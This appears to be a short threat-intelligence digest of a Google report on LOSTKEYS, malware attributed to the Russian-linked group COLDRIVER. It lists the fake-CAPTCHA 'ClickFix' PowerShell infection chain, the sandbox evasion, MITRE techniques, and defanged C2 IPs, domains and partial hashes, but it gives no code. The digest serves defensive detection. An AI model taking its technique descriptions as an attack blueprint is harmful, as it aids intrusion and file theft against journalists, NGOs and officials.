Google Threat Intelligence Group uncovered LOSTKEYS, a new malware by Russian-linked COLDRIVER targeting high-profile individuals to steal files and system data via a multi-stage PowerShell infection chain. Protection includes Google safety features and user awareness. (Affected: Governments, NGOs, Journalists, Think Tanks)
Keypoints :
- LOSTKEYS is malware linked to Russian state-backed group COLDRIVER targeting intelligence-related sectors.
- The malware steals files from specified directories and sends system information and running processes to attackers.
- COLDRIVER primarily uses credential phishing targeting NATO governments, NGOs, former intelligence/diplomatic officers.
- Infection chain starts with a fake CAPTCHA webpage tricking users to run PowerShell commands (“ClickFix” technique).
- Second stage checks device display resolution hash to evade virtual machines before downloading the next payload.
- Final payload is delivered as a Base64-encoded PowerShell script and a Visual Basic Script (VBS) decoder with unique keys per infection.
- LOSTKEYS extends COLDRIVER’s capabilities beyond credential theft to file exfiltration on select targets.
- Earlier December 2023 samples posed as Maltego software but executed the same malware, origin unclear.
- Google added malicious domains and files to Safe Browsing and alerts high-risk users while recommending Enhanced Safe Browsing and updates.
- YARA rules and indicators of compromise are shared to aid detection and community defense.
MITRE Techniques :
- Phishing (T1566) – COLDRIVER uses credential phishing via targeted emails to gain initial access.
- Command and Scripting Interpreter: PowerShell (T1059.001) – Malware delivered and executed through PowerShell commands.
- Masquerading (T1036) – December 2023 samples masquerade as legitimate Maltego software files.
- User Execution (T1204) – The infection relies on social engineering users to execute PowerShell scripts after fake CAPTCHA interaction.
- System Information Discovery (T1082) – Malware collects and sends system info and running processes to attackers.
- File and Directory Discovery (T1083) – LOSTKEYS searches specific file extensions and directories to exfiltrate files.
- Virtualization/Sandbox Evasion (T1497) – The malware calculates display resolution hash to evade sandbox/VM environments.
- Data Encoding (T1132) – Payload and communications are Base64 encoded, decoded using unique substitution ciphers.
- Remote File Copy (T1105) – Stages of malware downloaded from attacker-controlled C2 servers.
- Indicator Removal on Host (T1070) – Use of unique keys per infection chain likely intended to evade signature-based detection.
Indicator of Compromise :
- The article includes hashes of multiple malware components from different infection stages, e.g., ’13f7599c9…’ for fake CAPTCHA stage and ’28a0596b…’ for the final decoded payload.
- IP addresses for command and control servers are provided, such as 165.227.148[.]68 and 80.66.88[.]67, useful for network detection.
- Domains like cloudmediaportal[.]com and njala[.]dev are identified as malicious infrastructure used by the threat actor.
- YARA rules with unique string patterns for detecting the VBS decoder and stolen data beaconing are shared to facilitate automated detection.
- Presence of unique decoding keys per infection chain and Base64 encoded payloads are noted, which can help in forensic analysis and rule creation.
Views: 41